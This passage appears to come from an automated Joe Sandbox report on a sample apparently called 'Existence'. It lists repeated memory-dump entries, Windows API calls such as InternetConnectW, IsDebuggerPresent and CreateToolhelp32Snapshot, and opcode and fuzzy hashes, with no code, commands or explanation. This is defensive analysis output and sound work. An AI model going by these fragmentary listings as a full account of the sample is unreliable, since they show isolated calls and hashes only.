                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                          • Opcode ID: ad3edbca3803e71f5dcef334639ef3d13075610d4414d1b791703e7a973e9d16
                                                                                                                                                                                          • Instruction ID: 014ea1a6c62e1d2b44c4ee14ecce05657651f227b955f7dd61ac7a165abbc89b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3edbca3803e71f5dcef334639ef3d13075610d4414d1b791703e7a973e9d16
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0C83490070CF78B04BAA8DC5A9EE777C5E00351B604125BE14965A2FBFCE61DCAD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007B8D52
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 007B8D59
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 007B8F3A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                                          • Opcode ID: b6ac23171acbfda44c193d524dd2f2202748b6e519c8542009fe441f9f1b1c99
                                                                                                                                                                                          • Instruction ID: b0302a64fd0aa0a23c53f333b362f1c47472771bd05bc67e291077500e2a3e60
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ac23171acbfda44c193d524dd2f2202748b6e519c8542009fe441f9f1b1c99
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3127B71A08341DFD750DF28C484B6ABBE5FF88314F14895DE9898B292CB38E945CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$_strcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 306214811-0
                                                                                                                                                                                          • Opcode ID: 4675c5205c06de3a2400549cdd70bbf39c9f06407390c08c1a1db244e0d312f4
                                                                                                                                                                                          • Instruction ID: 56eee1bb753d699136a206d591f264a29af85c8d2ee2239f6e37090b339066f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4675c5205c06de3a2400549cdd70bbf39c9f06407390c08c1a1db244e0d312f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91A18D31604605EFCB18DF18C5D5AA9BBF1FF45314B2084ADEA5A8F292DB39ED45CB80
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007332AF
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 007332B7
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007332C2
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007332CD
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 007332D5
                                                                                                                                                                                            • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 007332DD
                                                                                                                                                                                            • Part of subcall function 00733205: RegisterWindowMessageW.USER32(00000004,?,00732964), ref: 0073325D
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00732A0A
                                                                                                                                                                                          • OleInitialize.OLE32 ref: 00732A28
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00773A0D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1986988660-0
                                                                                                                                                                                          • Opcode ID: ad31c3350704c6c9de7859551a22a4bcbc468a76af40eec4c56b036b0af6de12
                                                                                                                                                                                          • Instruction ID: a9425597cfa270ebbe1f676a442ee391a25e06001cd6b248ca49aa919bff7345
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad31c3350704c6c9de7859551a22a4bcbc468a76af40eec4c56b036b0af6de12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B7188B4901601CEE7D8EFA9AD6E6153BE0FB58304750827EA518C72B2EBF845458F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00736299
                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0074FD36
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074FD45
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078FE33
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                                          • Opcode ID: eaf156009a14ab70f1889fb6833edc904b2d5e5b6c3f6d266ad5d460f5cddafd
                                                                                                                                                                                          • Instruction ID: df59c7597154fdd6dfe6813e7c1d1fc922ef25689a68ced15649cd2370883bfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: eaf156009a14ab70f1889fb6833edc904b2d5e5b6c3f6d266ad5d460f5cddafd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9731A771A44744AFEB72DF24C859BE7BBECAF02308F0044AEE6D957242C3785A85CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007697BA,FF8BC369,00000000,00000002,00000000), ref: 00769744
                                                                                                                                                                                          • GetLastError.KERNEL32(?,007697BA,FF8BC369,00000000,00000002,00000000,?,00765ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00756F41), ref: 0076974E
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00769755
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                                          • Opcode ID: 7293a7bd31f1667dce69900659ee019c08a3b5d2c6bfaa39a104fc5402dd8cff
                                                                                                                                                                                          • Instruction ID: 7d6e8134574927cafde4c1cd1712f4a28f916b6bf76277ae083c8d63c4b55df8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7293a7bd31f1667dce69900659ee019c08a3b5d2c6bfaa39a104fc5402dd8cff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44014C32620514EBCB159F99DC09CAE7B2EEB85330B240219FD1287190EA74DD419B90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0077413B
                                                                                                                                                                                            • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
                                                                                                                                                                                            • Part of subcall function 00733A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00733A76
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                                          • Opcode ID: 8398dd44bfd04528f309f75602a3b49ed4837a270a65bd87344efa0d9c1cdd2e
                                                                                                                                                                                          • Instruction ID: 47c197820e18bc220d96b7c18390adb80e2e4fbc838a0bf74287f4644c6af190
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8398dd44bfd04528f309f75602a3b49ed4837a270a65bd87344efa0d9c1cdd2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01218171A002589BDF159F98C809BEE7BF8AF49304F008059E545A7342DBFC9A89CFA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32 ref: 0075007D
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0075008F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4162189087-0
                                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                          • Instruction ID: 6cb71eb3da873085c138ba43d013636d2ee4fd7ee25d7e14b2194a3e27ff3e10
                                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F131D770A00106DFDB18CF58D590AA9F7A5FF49301B6486A5E80DCB292D776EDC5CBC0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007ADB39: _wcslen.LIBCMT ref: 007ADB75
                                                                                                                                                                                            • Part of subcall function 007ADB39: InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007ADB7F
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 007ACE10
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 007ACE24
                                                                                                                                                                                            • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD844
                                                                                                                                                                                            • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD86B
                                                                                                                                                                                            • Part of subcall function 007ACEBB: InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACEF5
                                                                                                                                                                                            • Part of subcall function 007ACEBB: GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007ACF08
                                                                                                                                                                                            • Part of subcall function 007ACEBB: SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007ACF1C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$ErrorEventLastOptionQuery$ConnectCrack_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3507849315-0
                                                                                                                                                                                          • Opcode ID: 6891f1a81dbc8e1b5e847646af850738459994c084f00328b00b4151ca2f7a64
                                                                                                                                                                                          • Instruction ID: 8385457e073c5c2b3f3914c7f237f6634976d4aef60099d20770cd5d761c2a64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6891f1a81dbc8e1b5e847646af850738459994c084f00328b00b4151ca2f7a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821DAB2A00604FBCF329FB4C8499AF77BCAF96344B10461EF15297512DA3D9948DBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733A3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                          • Opcode ID: 7f51e24eba42bc0e223f556febea03e6b6b38672a3956f248a78034c015e72f8
                                                                                                                                                                                          • Instruction ID: a400d56a00d13ea44fc38abed3653f2bc35ddbaa0f2ee13e8e0650ad1ad7f489
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f51e24eba42bc0e223f556febea03e6b6b38672a3956f248a78034c015e72f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB318271504301DFE760DF24D889797BBE8FB49308F00092EF5D987251D7B9A944CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD844
                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD86B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InternetOptionQuery
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2202126096-0
                                                                                                                                                                                          • Opcode ID: 567607233e480e36c22df6ff3e22f13257c362594cddffeb889774433b9ec423
                                                                                                                                                                                          • Instruction ID: 1df7acd2b6dc0baca0eb97159d0f20e1037d2ea285db214ca42edd3677792731
                                                                                                                                                                                          • Opcode Fuzzy Hash: 567607233e480e36c22df6ff3e22f13257c362594cddffeb889774433b9ec423
                                                                                                                                                                                          • Instruction Fuzzy Hash: 85018172840118BEDB219E68CCC5DFF7B6CFB4A791B048126FD099B511D679DD8187E0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsThemeActive.UXTHEME ref: 0073333D
                                                                                                                                                                                            • Part of subcall function 007332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007332FB
                                                                                                                                                                                            • Part of subcall function 007332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733312
                                                                                                                                                                                            • Part of subcall function 0073338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00733368,?), ref: 007333BB
                                                                                                                                                                                            • Part of subcall function 0073338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00733368,?), ref: 007333CE
                                                                                                                                                                                            • Part of subcall function 0073338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00802418,00802400,?,?,?,?,?,?,00733368,?), ref: 0073343A
                                                                                                                                                                                            • Part of subcall function 0073338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007334BB
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00733377
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1550534281-0
                                                                                                                                                                                          • Opcode ID: 9a925e20137d3e59fcd27dbe395e479138b4fdd0202d36417d2e19ff66d03422
                                                                                                                                                                                          • Instruction ID: 35c6f4c5447ea4a1fe51e47a569532bef517d1d7830fb28dc5a08628eebcfdb4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a925e20137d3e59fcd27dbe395e479138b4fdd0202d36417d2e19ff66d03422
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF05E715587449FE7616F64FC0EB643794B70471AF01881AB6098A2F3DBFE85648B44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0073CEEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                                          • Opcode ID: d8633795cbc347dfab3dc2b6ea4a3416b0dd8f46bcf10249da1f1764377b90b8
                                                                                                                                                                                          • Instruction ID: 71c334b3d3180eff28ac42a8a9404cd1266bab65e38699171a89e1e5414231bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: d8633795cbc347dfab3dc2b6ea4a3416b0dd8f46bcf10249da1f1764377b90b8
                                                                                                                                                                                          • Instruction Fuzzy Hash: A532D075A00205EFEB21DF54C884ABAB7B9FF44350F198069E916AB352D73CED42CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2948472770-0
